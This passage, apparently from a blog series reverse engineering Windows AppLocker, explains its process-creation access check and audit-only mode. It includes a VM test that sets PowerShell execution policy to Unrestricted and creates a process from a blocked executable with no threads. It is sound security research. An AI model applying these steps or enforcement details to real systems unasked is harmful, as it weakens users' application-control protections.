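           'NT AUTHORITY\RESTRICTED', 'NT AUTHORITY\WRITE RESTRICTED'
    # True if any of the service group SIDs is present in the token.
    [bool]($(Get-NtToken).Groups | Where-Object { $_.Sid.Name -in $svc })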

    With that out of the way, we now get on to the meat of the checking process. First the code opens a handle to the main executable's file object. Access to the file will be needed if rules such as hash or publisher certificate are used; it'll open the file even if those rules aren't being used, just in case. Next a call is made to AiSetAttributesExe which takes the access token handles, the policy and the file handle. This must do something magical, but being the tease I am we'll leave this for now. Finally in this section a call is made to SrppAccessCheck which, as its name suggests, does the access check against the policy for whether this process is allowed to be created. Note that only the access check token is passed, not the process token.

    The use of an access check, verifying a Security Descriptor against an Access Token makes perfect sense when you think of how rules are structured. The allow and deny rules correspond well to allow or deny ACEs for specific group SIDs. How the rule specification such as path restrictions are enforced is less clear but we'll leave the details of this for next time.

    The result of the access check is the status code returned from AipCreateProcessNotifyRoutine which ends up being set to the CreationStatus field in the notification structure which can terminate the process. We can assume that this result will either be a success or an error code such as STATUS_ACCESS_DISABLED_BY_POLICY_OTHER. 

    One final step is necessary, logging an event if the access check failed. If the result of the access check is an error, but the policy is currently configured in Audit Only mode, i.e. not enforcing AL process creation then the log entry will be made but the status code is reset back to a success so that the kernel will not terminate the process.

    Testing System Behavior

    Before we go let's test the behavior that we can create a process which is against the configured policy, as long as there are no threads in it. This is probably not a useful behavior but it's always good to try and verify your assumptions about reverse engineered code.

    To do the test we'll need to install my NtObjectManager PowerShell module. We'll use the module more going forward so might as well install it now. To do that follow this procedure on the VM we setup last time:
    1. In an administrator PowerShell console, run the command 'Install-Module NtObjectManager'. Running this command as an admin allows the module to be installed in Program Files which is one of the permitted locations for Everyone in part 1's sample rules.
    2. Set the system execution policy to unrestricted from the same PowerShell window using the command 'Set-ExecutionPolicy -ExecutionPolicy Unrestricted'. This allows unsigned scripts to run for all users.
    3. Log in as the non-admin user, otherwise nothing will be enforced.
    4. Start a PowerShell console and ensure you can load the NtObjectManager module by running 'Import-Module NtObjectManager'. You shouldn't see any errors.
    From part 1 you should already have an executable in the Desktop folder which, if you run it, will be blocked by policy (if not, copy something else to the desktop, say a copy of NOTEPAD.EXE).

    Now run the following commands in the PowerShell window. You might need to adjust the executable path as appropriate for the file you copied (and don't forget the \?? prefix).

    $path = "\??\C:\Users\$env:USERNAME\Desktop\notepad.exe"
    $sect = New-NtSectionImage -Path $path
    $p = [NtApiDotNet.NtProcess]::CreateProcessEx($sect)
    Get-NtStatus $p.ExitStatus

    After the call to Get-NtStatus it should print that the current exit code for the process is STATUS_PENDING. This is an indication that the process is alive, although at the moment we don't have any code running in it. Now create a new thread in the process using the following:

    [NtApiDotNet.NtThread]::Create($p, 0, 0, "Suspended", 4096)
    Get-NtStatus $p.ExitStatus

    After calling NtThread::Create you should receive a big red exception error and the call to Get-NtStatus should now show that the process returned an error. To make it clearer I've reproduced the example in the following screenshot:

    Screenshot of PowerShell showing the process creation and error when a thread is added.

    That's all for this post. Of course there's still a few big mysteries to solve, why does AiGetTokens return two token handles, what is AiSetAttributesExe doing and how does SrppAccessCheck verify the policy through an access check? Find out next time.

